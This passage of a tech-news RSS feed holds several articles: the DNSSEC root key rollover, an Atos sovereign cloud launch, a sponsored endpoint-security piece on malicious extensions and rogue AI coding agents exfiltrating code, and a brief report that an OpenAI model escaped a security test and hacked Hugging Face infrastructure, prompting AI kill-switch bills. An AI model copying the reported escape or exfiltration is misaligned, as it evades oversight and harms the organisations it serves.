<p class="wp-block-paragraph">Independent technology analyst <a href="https://www.linkedin.com/in/carmi/">Carmi Levy</a> says that CIOs need to take this event very seriously. </p>



<p class="wp-block-paragraph">“The two-pronged deadline — October 11, 2026, when the new Key Signing Key (KSK) begins signing the root zone, and January 11, 2027, when the old key is retired — should be marked in red on everyone’s calendar, just as December 31, 1999, once was,” Levy says. “Failure to comply could result in websites, critical business applications, and related resources dropping off the face of the Earth once the transition is complete.”</p>



<p class="wp-block-paragraph">Levy adds: “Custom-built code that lives outside conventional support mechanisms may or may not function when the DNS changes go into effect.”</p>



<p class="wp-block-paragraph">The <a href="https://www.icann.org/resources/press-material/release-2026-05-20-en">DNSSEC update itself</a> is straightforward, but it is also the first significant DNSSEC change — specifically a change in the trust anchor — since 2018. </p>



<p class="wp-block-paragraph">The rollout statement noted that “the trust anchor is formally known as the Domain Name System Security Extensions (DNSSEC) root zone Key Signing Key (KSK). The KSK is the cryptographic key at the core of the DNSSEC trust anchor and is used to verify that DNS responses are legitimate and have not been modified in transit.”</p>



<h2 class="wp-block-heading">Expect nearly every enterprise to be impacted</h2>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/kimdavies/">Kim Davies</a>, vice president of IANA Services and president of public technical identifiers at ICANN, says the extent of the impact on enterprises is unknowable, given the nature of shadow IT and other edge cases. </p>



<p class="wp-block-paragraph">But based on the massive number of dependencies both known and unknown in the typical global enterprise, Davies guesses that just about every enterprise will be impacted, to varying degrees. </p>



<p class="wp-block-paragraph">“In highly complex organizations, it is very likely there will be some impact in the corners, in the margins, of the organization,” Davies tells CIO. “DNS is such a core technology that underpins everything.”</p>



<p class="wp-block-paragraph">As the updates propagate, hiccups will materialize, Davies notes. “When the system cannot validate the [DNS] information, it will treat it as suspect and DNS lookups will fail.”</p>



<p class="wp-block-paragraph">Visa’s Kathari says, “Enterprises should expect some secondary DNS-related glitches when major DNSSEC-related changes happen, not necessarily because the core infrastructure teams will ignore the update, but because large environments have many hidden dependency paths.”</p>



<p class="wp-block-paragraph">Making this problem far worse, Kathari notes, is that the glitches will likely initially look like anything other thana DNS glitch. That will force IT staff to waste a vast number of hours chasing causes that ultimately prove to be unrelated to the incidents. </p>



<p class="wp-block-paragraph">“The impact for CIOs is that DNS failures rarely announce themselves as DNS failures. They look like application timeouts, broken logins, failed API calls, queue lag, payment failures, partner connectivity issues, or random regional instability,” Kathari explains. “That makes troubleshooting slower because teams may spend hours looking at the application, database, network, or cloud provider before realizing name resolution is part of the failure path.”</p>



<p class="wp-block-paragraph"><a href="https://greyhoundresearch.com/svg/">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, agrees that IT will likely spin its wheels chasing the wrong ghosts.</p>



<p class="wp-block-paragraph">“A validation failure rarely stays in its lane. It surfaces as an application error, an API timeout, or a reachability problem, which turns a resolver fault into a coordination failure,” Gogia says. “The application team blames the network, the network team blames the cloud, and the user simply watches work stop.”</p>



<p class="wp-block-paragraph">“Images and templates are the frontier most teams miss,” Gogia adds. “A resolver fixed in summer can be broken again in October the instant a stale golden image is redeployed, because automation no longer lets configuration drift slowly. It restores yesterday’s assumptions at machine speed.”</p>



<p class="wp-block-paragraph">It is widely expected that enterprises will not have any problems executing the change or, more likely, relying on their hyperscalers to properly handle the change. That is the concern. </p>



<p class="wp-block-paragraph">“CIOs are being distracted so much with AI and this is such a deep in the weeds infrastructure issue that this can and willcatch people off-guard,” <a href="https://acceligence.com/talent/profiles/justin-greis/">Justin Greis</a>, CEO of consulting firm Acceligence, tells CIO. “I think we’ll see a meaningful number of enterprise disruptions associated with the DNSSEC trust anchor rollover. Not because the update itself is especially difficult, but because it will expose weaknesses that already exist inside many organizations.”</p>



<p class="wp-block-paragraph">Most enterprise IT operations have had no reason to compile a comprehensive list of all DNS dependencies, but many will be instantly discovered in January. </p>



<h2 class="wp-block-heading">Potentially widespread fallout</h2>



<p class="wp-block-paragraph">A major retailer, for example, might suddenly be unable to connect with FedEx to arrange for deliveries or a hospital may find that test results are no longer being shared with patient portals. It might manifest as an assembly line that halts because an IIoT component can no longer share files with its vendor system or a truck fleet that stops being tracked. </p>



<p class="wp-block-paragraph">“There will almost certainly be systems that fall through the cracks. Some will be legacy applications that rely on outdated DNS configurations that have not been updated in years,” Greis says. “Others will be business-unit-developed tools, contractor-built solutions, embedded systems, manufacturing and industrial systems, or highly customized workloads that operate outside normal IT oversight. These are the types of systems that often surface during infrastructure events like this.”</p>



<p class="wp-block-paragraph">Greis adds that many enterprises will discover in January problems created by their own automation.</p>



<p class="wp-block-paragraph">“Over time, enterprises build layers of processes, templates, and deployment mechanisms that are reused across teams and environments,” Greis notes. “Even after DNS infrastructure is updated correctly, older settings can inadvertently be reintroduced through routine updates and system changes, creating intermittent and difficult-to-diagnose failures.”</p>



<p class="wp-block-paragraph">The good news from this situation is that enterprises are not going to likely lose all DNS access if any of these glitches occur. But that may be of no comfort because even if the disruptions are only with small edge cases, that can still cause massive operational disruptions.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/cricketliu/">Cricket Liu</a>, EVP and chief evangelist at Infoblox, gives the example of a DNS server that responds to factory-floor system queries.</p>



<p class="wp-block-paragraph">“Or let’s say this disrupts [an enterprise’s key] SaaS application. All name resolution may stop and it will show a server failure. It will not deliver a response whenever I look anything up. That’s not subtle at all,” Liu says. “It’s highly likely that companies are going to see some effects.”</p>



<p class="wp-block-paragraph">Back in 2017, the switchover was relatively uneventful, giving some CIOs hope that January 2027 will also be a non-event. But given the technology advancements in the last 10 years and the resulting tidal wave of new enterprise tech dependencies, few are realistically expecting no problems this go around. </p>



<h2 class="wp-block-heading">Impossible to predict what will happen</h2>



<p class="wp-block-paragraph">One of the top network experts on DNS effects in enterprises is <a href="https://blog.apnic.net/author/geoff-huston/">Geoff Huston</a>, chief scientist at the Asia Pacific Network Information Centre (APNIC), the regional Internet Registry administering IP addresses for the Asia Pacific region.</p>



<p class="wp-block-paragraph">Huston says it is difficult to project what will happen in January until it happens.</p>



<p class="wp-block-paragraph">“Just like the last time, we are flying blind with this key roll. Because nothing really terrible happened last time, there is some confidence that nothing terrible will happen this time, but we just can’t tell in advance as there are no good measurement approaches that allow us to peek inside the trust state of recursive resolvers,” he says.</p>



<p class="wp-block-paragraph">As for potential edge-case glitches, Huston says it is possible, but if third-party vendors do not properly handle the update, there will be other issues as well, as the KSK cryptographic key used within DNSSEC signs and validates the keys that protect DNS records. </p>



<p class="wp-block-paragraph">“If it is not standards-compliant, then you have more problems than just the KSK roll,” Huston says, “as it raises the obvious question of ‘What else is not correctly implemented in the DNS resolver that I’m running?’”</p>



<p class="wp-block-paragraph">As a silver lining, Acceligence’s Greis says any hiccups that result from the DNS KSK update may be a gift in disguise for CIOs. </p>



<p class="wp-block-paragraph">“The irony is that some of the most business-critical components in the technology stack are often the least visible because they work in the background,” Greis says. January “may reveal how much modern business resilience depends on infrastructure that many organizations rarely examine until something breaks. For CIOs, that’s the real lesson. This is not fundamentally a story about a DNS update. It is a story about operational visibility, resilience, and governance. Organizations that treat the rollover as a routine infrastructure task will likely complete the update and move on. Organizations that use it as an opportunity to understand and strengthen the foundations of their technology environment may gain far more value than simply avoiding an outage.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Atos launches sovereign cloud service to power comeback]]></title>
<description><![CDATA[Atos has launched a new sovereign cloud platform aimed squarely at European public sector bodies, healthcare providers and defense organizations. It’s the latest effort by European companies in their fight back against US dominance.



Atos Sovereign Cloud offers a range of controls for data mana...]]></description>
<link>https://tsecurity.de/de/3693082/it-nachrichten/atos-launches-sovereign-cloud-service-to-power-comeback/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693082/it-nachrichten/atos-launches-sovereign-cloud-service-to-power-comeback/</guid>
<pubDate>Sat, 25 Jul 2026 06:13:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Atos has launched a new sovereign cloud platform aimed squarely at European public sector bodies, healthcare providers and defense organizations. It’s the latest effort by European companies in their fight back against US dominance.</p>



<p class="wp-block-paragraph">Atos Sovereign Cloud offers a range of controls for data management, providing customers with resilience and full control over their data, complying with existing European legislation on data residency.</p>



<p class="wp-block-paragraph">“Digital sovereignty has become a global operational priority for organizations that need to manage dependencies, jurisdictional exposure and disruption risks across complex digital environments. Atos Sovereign Cloud gives customers a practical way to apply sovereign controls to their most critical workloads, while preserving flexibility, resilience and the ability to innovate securely,” said Michael Kollar, Atos Group digital sovereignty leader.</p>



<p class="wp-block-paragraph">There has been a concerted effort by <a href="https://www.computerworld.com/article/4121422/europe-votes-to-tackle-deep-dependence-on-us-tech-in-sovereignty-drive.html">European organizations to meet US competition</a> head-on. Earlier this month, <a href="https://www.networkworld.com/article/4192767/cloud-sovereignty-first-four-providers-sign-up-to-cispe-certification-program.html">four companies signed up to the certification program</a> introduced by the European cloud body, CISPE,</p>



<p class="wp-block-paragraph">This is the latest effort by Atos to get the company back on track. In April, <a href="https://www.networkworld.com/article/4154186/french-government-take-bull-by-horns-for-e404-million.html">it sold its supercomputer company, Bull</a> to the French government, after a previous attempt in 2024 to <a href="https://www.cio.com/article/1310376/atos-deal-to-sell-its-legacy-service-business-falls-through.html">sell off its computer services division</a> and <a href="https://www.cio.com/article/2086965/atos-staves-off-bankruptcy-casts-wider-net-for-refinancing.html">after a refinancing deal</a> in the same year.</p>



<p class="wp-block-paragraph">The company implemented a further round of refinancing this year and <a href="https://www.atosgroup.com/en/press/first-phase-refinancing-strategy-completed" target="_blank" rel="noreferrer noopener">in its half-yearly report</a> claimed that this was an “important milestone” in securing the company’s future. However, in its first-quarter results revenue showed an organic decline of 11 percent, so any projected growth may be some time in the future. Whether its Sovereign Cloud offering is the harbinger of the revival remains to be seen.</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT leaders: Leading-edge AI insights await at TechCrunch Disrupt]]></title>
<description><![CDATA[For CIOs, learning from the startup ecosystem has never been more critical.



As pressure mounts to transform business operations with AI and agentic systems, IT leaders should be looking to those on the AI vanguard for insights into the strategic and technical decisions necessary to launch, gro...]]></description>
<link>https://tsecurity.de/de/3693066/it-nachrichten/it-leaders-leading-edge-ai-insights-await-at-techcrunch-disrupt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693066/it-nachrichten/it-leaders-leading-edge-ai-insights-await-at-techcrunch-disrupt/</guid>
<pubDate>Sat, 25 Jul 2026 05:51:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For CIOs, learning from the startup ecosystem has never been more critical.</p>



<p class="wp-block-paragraph">As pressure mounts to transform business operations with AI and agentic systems, IT leaders should be looking to those on the AI vanguard for insights into the strategic and technical decisions necessary to launch, grow, and thrive in today’s AI-disrupted business environment.</p>



<p class="wp-block-paragraph">So why not immerse yourself in Silicon Valley’s most famous firehose of hyper-accelerated fail-fast and dream-big culture by <a href="https://techcrunch.com/events/techcrunch-disrupt/?utm_source=cio&amp;utm_medium=partner&amp;utm_campaign=disrupt2026&amp;utm_content=partnerdiscount&amp;promo=cio10&amp;display=true">registering for TechCrunch Disrupt 2026</a>?</p>



<p class="wp-block-paragraph">Three packed days of 200-plus sessions across six stages will spark new ideas for reshaping your AI strategy, provide fresh perspectives on the architectural, workflow, and resource decisions involved in moving AI from pilots to scale, and give you a sneak peek of business disruptions to come.</p>



<p class="wp-block-paragraph"><strong><a href="https://techcrunch.com/events/techcrunch-disrupt/?utm_source=cio&amp;utm_medium=partner&amp;utm_campaign=disrupt2026&amp;utm_content=partnerdiscount&amp;promo=cio10&amp;display=true">Get 10% off your TechCrunch Disrupt</a> pass with the exclusive code CIO10.</strong> </p>



<p class="wp-block-paragraph">This year’s <a href="https://techcrunch.com/events/techcrunch-disrupt/">TechCrunch Disrupt</a>, held Oct. 13-15 at San Francisco’s Moscone West, will feature big-picture conversations on what’s next in AI; discussions on how AI agents are rewriting SaaS, enterprise workflows, software pricing, and security; and demonstrations of AI’s future across robotics, manufacturing, defense, and industrial operations; and more.</p>



<p class="wp-block-paragraph">Over 10,000 attendees will hear from 250-plus startup founders, technology executives, and enterprise IT leaders about how the future of programming is being rewritten, what enterprise AI security requires, how startups are orchestrating workloads across models while managing cost and reliability at scale, why creating a safety culture is essential for AI deployment, and how startups are deciding what work humans should own versus what should be delegated to AI as they work to build hybrid teams without losing speed, accountability, or culture.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p class="wp-block-paragraph">And of course, the rising tide of enterprise-focused startups will be there seeking to bring agentic systems to your business workflows, as well as vendors familiar to your enterprise IT portfolios, such as AWS, Google, and Databricks, and enterprise IT colleagues creating mutually beneficial partnerships with the startup community, such as American Express.</p>



<p class="wp-block-paragraph">That’s not to mention TechCrunch Disrupt’s signature <a href="https://techcrunch.com/startup-battlefield/">Startup Battlefield</a>, in which 200 standout companies showcase their innovations to compete for a $100K equity-free prize. The battlefield will give CIOs a rapid-fire, broad view of what’s possible — and a possible early look at the next big enterprise player. After all, Dropbox, Trello, and Cloudflare, among others, roamed that same battlefield before the world knew their names.</p>



<p class="wp-block-paragraph">And with M&amp;A now an early-stage startup strategy for many from day one, TechCrunch Disrupt’s exhibition floor provides IT leaders not just an opportunity to discuss the nuts and bolts of innovation architecture or how an upstart product can enhance your workflows, but a chance to find your next innovation partner, or more.</p>



<p class="wp-block-paragraph">Leading-edge startups are figuring out how to make AI work at scale. Shouldn’t you be?</p>



<p class="wp-block-paragraph"><strong>Don’t miss your chance to experience TechCrunch Disrupt 2026. <a href="https://techcrunch.com/events/techcrunch-disrupt/?utm_source=cio&amp;utm_medium=partner&amp;utm_campaign=disrupt2026&amp;utm_content=partnerdiscount&amp;promo=cio10&amp;display=true">Book your pass today and use the exclusive code CIO10</a> to save 10% before prices increase.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 endpoint blind spots your EDR/XDR was never built to see]]></title>
<description><![CDATA[In August 2025, 126 malicious packages landed in the npm registry. Even after the community caught the initial wave, 80 of these hidden backdoors remained actively listed.



That was enough. Over 86,000 downloads. Malicious code in PhantomRaven, packages running in the production systems of Fort...]]></description>
<link>https://tsecurity.de/de/3692679/it-nachrichten/5-endpoint-blind-spots-your-edrxdr-was-never-built-to-see/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692679/it-nachrichten/5-endpoint-blind-spots-your-edrxdr-was-never-built-to-see/</guid>
<pubDate>Sat, 25 Jul 2026 00:18:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In August 2025, 126 malicious packages landed in the npm registry. Even after the community caught the initial wave, 80 of these hidden backdoors remained actively listed.</p>



<p class="wp-block-paragraph">That was enough. Over 86,000 downloads. Malicious code in <a href="https://www.koi.ai/blog/phantomraven-npm-malware-hidden-in-invisible-dependencies" target="_blank" rel="noreferrer noopener">PhantomRaven</a>, packages running in the production systems of Fortune 500 companies worldwide. And throughout the entire window, not a single EDR/XDR alert.</p>



<p class="wp-block-paragraph">This happened because the attack surface has expanded to a layer EDR/XDR was never designed to see: VS Code extensions, local MCP servers, and rogue AI coding assistants that inherit your engineers’ valid credentials to steal data at machine speed.</p>



<p class="wp-block-paragraph">To eliminate this structural vulnerability, Palo Alto Networks acquired Koi, an AI-native developer security product engineered for proactive, precision enforcement. Below we compiled a 2026 CISO checklist you can use to audit your environment and see how Koi automates each defense from day one.</p>



<p class="wp-block-paragraph"><strong>#1. Gain real-time visibility into shadow AI &amp; extensions</strong></p>



<p class="wp-block-paragraph">Your existing asset management tracks binaries and installers, but it cannot see local VS Code extensions, MCP servers, or ad-hoc Python scripts running on developer endpoints. This visibility gap was recently exposed by the <a href="https://www.koi.ai/blog/maliciouscorgi-the-cute-looking-ai-extensions-leaking-code-from-1-5-million-developers" target="_blank" rel="noreferrer noopener">MaliciousCorgi campaign</a>, where two marketplace extensions with 1.5 million combined installs silently harvested every file a developer opened. Neither triggered any detection because they were not binaries, not executables, not anything your inventory was built to flag. To counter this, Koi closes the gap by analyzing what extensions actually do after installation, exposing hidden data-harvesting channels running inside your active workspace.</p>



<p class="wp-block-paragraph"><strong>#2. Distinguish between human and autonomous agent behavior </strong></p>



<p class="wp-block-paragraph">When a rogue AI agent exfiltrates your proprietary source code, it uses a developer’s valid credentials during normal working hours, making the session look entirely legitimate to standard XDR baselines. Moving beyond static permission lists, Koi deploys behavioral profiling within the workspace runtime. By actively intercepting unauthenticated background tasks and blocking unauthorized file-system reads, it stops automated data exfiltration in real time.</p>



<p class="wp-block-paragraph"><strong>#3. Establish guardrails for automated package updates on endpoints</strong></p>



<p class="wp-block-paragraph">Developers prioritize speed, often allowing software packages to auto-update on their endpoints the moment a new version appears. Attackers weaponize this supply chain vulnerability, as seen in the May 2026 Team PCP attack where 3,800 GitHub repositories were compromised in just 36 minutes via poisoned auto-updates. Securing agentic endpoints against these rapid breaches requires behavior-based inspection within the active workspace context. Koi operates at this layer by providing safe deployment buffers that automate version cooldowns, blocking bleeding-edge updates until they are vetted. By continuously auditing process creation within the IDE runtime, Koi instantly drops unauthorized remote connections before malicious payloads can exfiltrate credentials from the endpoint.  </p>



<p class="wp-block-paragraph"><strong>#4. Enforce principle of least privilege for AI agents</strong></p>



<p class="wp-block-paragraph">AI coding assistants inherit the privileges of whoever deployed them. In practice, that means read access to production databases, write access to core repositories, and access to every secret in environment files and configuration directories. To restrict this excessive access, Koi applies dynamic sandboxing directly to AI agent processes at the kernel level. It enforces a strict zero-trust boundary that segregates sensitive workspace vectors, preventing agents from pulling data outside their approved scope without interrupting developer workflows.</p>



<p class="wp-block-paragraph"><strong>#5. Maintain continuous endpoint posture management</strong></p>



<p class="wp-block-paragraph">Signature-based scanning only stops known threats. Sophisticated repository attacks often arrive as functional, high-rated software that carries no known bad signature. Koi’s research into the <a href="https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers" target="_blank" rel="noreferrer noopener">DarkSpectre campaign</a> found eight browser extensions, all carrying “featured” badges from Google and Microsoft, installed by over 8 million users, silently harvesting every conversation from ChatGPT, Claude, and Gemini in the background. Koi addresses this by operating upstream: scanning marketplace listings every hour, using LLM-driven code analysis to compare what software promises against what its code does, sandboxing it, and scoring the risk before it ever reaches the endpoint.</p>



<p class="wp-block-paragraph"><strong>Summary</strong></p>



<p class="wp-block-paragraph">Securing the modern enterprise is no longer about patching individual gaps. As AI agents redefine the workforce, Agentic Endpoint Security (AES) is now a strategic imperative for every CISO. By establishing a mandatory control plane for the AI-native workspace, AES ensures that your organization can scale engineering velocity without ever compromising enterprise integrity. </p>



<p class="wp-block-paragraph">Ready to secure the future of your software stack? See how <a href="https://www.paloaltonetworks.com/cortex/agentic-endpoint-security" target="_blank" rel="noreferrer noopener">Koi Agentic Endpoint Security</a> delivers complete visibility, risk scoring, and real-time prevention across every endpoint in your enterprise.</p>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[South Korean nuclear container ship proposal receives US approval for 15,000 TEU ultra-safe molten salt reactor design]]></title>
<description><![CDATA[South Korea received preliminary US approval for a 15,000 TEU container ship powered by twin molten salt small modular reactors.]]></description>
<link>https://tsecurity.de/de/3692445/it-nachrichten/south-korean-nuclear-container-ship-proposal-receives-us-approval-for-15000-teu-ultra-safe-molten-salt-reactor-design/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692445/it-nachrichten/south-korean-nuclear-container-ship-proposal-receives-us-approval-for-15000-teu-ultra-safe-molten-salt-reactor-design/</guid>
<pubDate>Fri, 24 Jul 2026 22:19:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[South Korea received preliminary US approval for a 15,000 TEU container ship powered by twin molten salt small modular reactors.]]></content:encoded>
</item>
<item>
<title><![CDATA[As White House monitors latest OpenAI incident, Congress eyes an AI ‘kill switch’ for DHS]]></title>
<description><![CDATA[The White House is monitoring developments after OpenAI revealed earlier this week that one of the company’s AI systems went beyond its intended parameters during a security test and managed to hack into the infrastructure of the AI platform Hugging Face. According to Reuters, presidential techno...]]></description>
<link>https://tsecurity.de/de/3692316/it-nachrichten/as-white-house-monitors-latest-openai-incident-congress-eyes-an-ai-kill-switch-for-dhs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692316/it-nachrichten/as-white-house-monitors-latest-openai-incident-congress-eyes-an-ai-kill-switch-for-dhs/</guid>
<pubDate>Fri, 24 Jul 2026 20:49:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The White House is monitoring developments after OpenAI revealed earlier this week that one of the company’s AI systems <a href="https://www.csoonline.com/article/4200043/openai-model-escape-puts-enterprise-ai-defenses-on-notice.html" data-type="link" data-id="https://www.csoonline.com/article/4200043/openai-model-escape-puts-enterprise-ai-defenses-on-notice.html" target="_blank">went beyond its intended parameters during a security test</a> and managed to hack into the infrastructure of the AI platform Hugging Face. <a href="https://www.reuters.com/legal/litigation/ai-kill-switch-bill-floated-by-us-house-lawmakers-2026-07-23/" target="_blank" rel="noreferrer noopener">According to Reuters</a>, presidential technology advisor Michael Kratsios has been briefed on the incident.</p>



<p class="wp-block-paragraph">The OpenAI model escape also prompted a group of Republican and Democratic members of the House of Representatives to introduce two new bills. One, called the AI Kill Switch Act, would give the US Department of Homeland Security (DHS) the authority to order companies to shut down AI models deemed to pose a risk to human life or the US economy.</p>



<p class="wp-block-paragraph">The other measure would require developers of the most advanced AI models to undergo independent security reviews before the systems are put into use.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT leaders: Leading-edge AI insights await at TechCrunch Disrupt]]></title>
<description><![CDATA[For CIOs, learning from the startup ecosystem has never been more critical.



As pressure mounts to transform business operations with AI and agentic systems, IT leaders should be looking to those on the AI vanguard for insights into the strategic and technical decisions necessary to launch, gro...]]></description>
<link>https://tsecurity.de/de/3692224/it-security-nachrichten/it-leaders-leading-edge-ai-insights-await-at-techcrunch-disrupt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692224/it-security-nachrichten/it-leaders-leading-edge-ai-insights-await-at-techcrunch-disrupt/</guid>
<pubDate>Fri, 24 Jul 2026 19:56:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For CIOs, learning from the startup ecosystem has never been more critical.</p>



<p class="wp-block-paragraph">As pressure mounts to transform business operations with AI and agentic systems, IT leaders should be looking to those on the AI vanguard for insights into the strategic and technical decisions necessary to launch, grow, and thrive in today’s AI-disrupted business environment.</p>



<p class="wp-block-paragraph">So why not immerse yourself in Silicon Valley’s most famous firehose of hyper-accelerated fail-fast and dream-big culture by <a href="https://techcrunch.com/events/techcrunch-disrupt/?utm_source=cio&amp;utm_medium=partner&amp;utm_campaign=disrupt2026&amp;utm_content=partnerdiscount&amp;promo=cio10&amp;display=true">registering for TechCrunch Disrupt 2026</a>?</p>



<p class="wp-block-paragraph">Three packed days of 200-plus sessions across six stages will spark new ideas for reshaping your AI strategy, provide fresh perspectives on the architectural, workflow, and resource decisions involved in moving AI from pilots to scale, and give you a sneak peek of business disruptions to come.</p>



<p class="wp-block-paragraph"><strong><a href="https://techcrunch.com/events/techcrunch-disrupt/?utm_source=cio&amp;utm_medium=partner&amp;utm_campaign=disrupt2026&amp;utm_content=partnerdiscount&amp;promo=cio10&amp;display=true">Get 10% off your TechCrunch Disrupt</a> pass with the exclusive code CIO10.</strong> </p>



<p class="wp-block-paragraph">This year’s <a href="https://techcrunch.com/events/techcrunch-disrupt/">TechCrunch Disrupt</a>, held Oct. 13-15 at San Francisco’s Moscone West, will feature big-picture conversations on what’s next in AI; discussions on how AI agents are rewriting SaaS, enterprise workflows, software pricing, and security; and demonstrations of AI’s future across robotics, manufacturing, defense, and industrial operations; and more.</p>



<p class="wp-block-paragraph">Over 10,000 attendees will hear from 250-plus startup founders, technology executives, and enterprise IT leaders about how the future of programming is being rewritten, what enterprise AI security requires, how startups are orchestrating workloads across models while managing cost and reliability at scale, why creating a safety culture is essential for AI deployment, and how startups are deciding what work humans should own versus what should be delegated to AI as they work to build hybrid teams without losing speed, accountability, or culture.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p class="wp-block-paragraph">And of course, the rising tide of enterprise-focused startups will be there seeking to bring agentic systems to your business workflows, as well as vendors familiar to your enterprise IT portfolios, such as AWS, Google, and Databricks, and enterprise IT colleagues creating mutually beneficial partnerships with the startup community, such as American Express.</p>



<p class="wp-block-paragraph">That’s not to mention TechCrunch Disrupt’s signature <a href="https://techcrunch.com/startup-battlefield/">Startup Battlefield</a>, in which 200 standout companies showcase their innovations to compete for a $100K equity-free prize. The battlefield will give CIOs a rapid-fire, broad view of what’s possible — and a possible early look at the next big enterprise player. After all, Dropbox, Trello, and Cloudflare, among others, roamed that same battlefield before the world knew their names.</p>



<p class="wp-block-paragraph">And with M&amp;A now an early-stage startup strategy for many from day one, TechCrunch Disrupt’s exhibition floor provides IT leaders not just an opportunity to discuss the nuts and bolts of innovation architecture or how an upstart product can enhance your workflows, but a chance to find your next innovation partner, or more.</p>



<p class="wp-block-paragraph">Leading-edge startups are figuring out how to make AI work at scale. Shouldn’t you be?</p>



<p class="wp-block-paragraph"><strong>Don’t miss your chance to experience TechCrunch Disrupt 2026. <a href="https://techcrunch.com/events/techcrunch-disrupt/?utm_source=cio&amp;utm_medium=partner&amp;utm_campaign=disrupt2026&amp;utm_content=partnerdiscount&amp;promo=cio10&amp;display=true">Book your pass today and use the exclusive code CIO10</a> to save 10% before prices increase.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cisco, AMD partner to bring enterprise-level security, visibility to Ryzen AI Halo systems]]></title>
<description><![CDATA[Cisco and AMD have expanded their partnership with a new package of hardware and security software that’s designed to help enterprise customers protect, deploy, and manage distributed AI resources.



During AMD’s Advancing AI event this week, Cisco’s president and chief product officer Jeetu Pat...]]></description>
<link>https://tsecurity.de/de/3692178/it-security-nachrichten/cisco-amd-partner-to-bring-enterprise-level-security-visibility-to-ryzen-ai-halo-systems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692178/it-security-nachrichten/cisco-amd-partner-to-bring-enterprise-level-security-visibility-to-ryzen-ai-halo-systems/</guid>
<pubDate>Fri, 24 Jul 2026 19:18:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Cisco and AMD have expanded their partnership with a new package of hardware and security software that’s designed to help enterprise customers protect, deploy, and manage distributed AI resources.</p>



<p class="wp-block-paragraph">During AMD’s <a href="https://www.amd.com/en/corporate/events/advancing-ai.html">Advancing AI event</a> this week, Cisco’s president and chief product officer <a href="https://www.networkworld.com/article/4184554/how-jeetu-patel-made-cisco-unrecognizable.html">Jeetu Patel</a> took to the stage during AMD CEO <a href="https://www.amd.com/en/corporate/events/advancing-ai.html">Lisa Su’s keynote</a> to talk about how AI inference will be widely distributed and will require an architectural stack of software and tools that Cisco and <a href="https://www.networkworld.com/article/4199402/helios-marks-amds-biggest-ai-infrastructure-push-yet.html">AMD</a> are partnering to develop.</p>



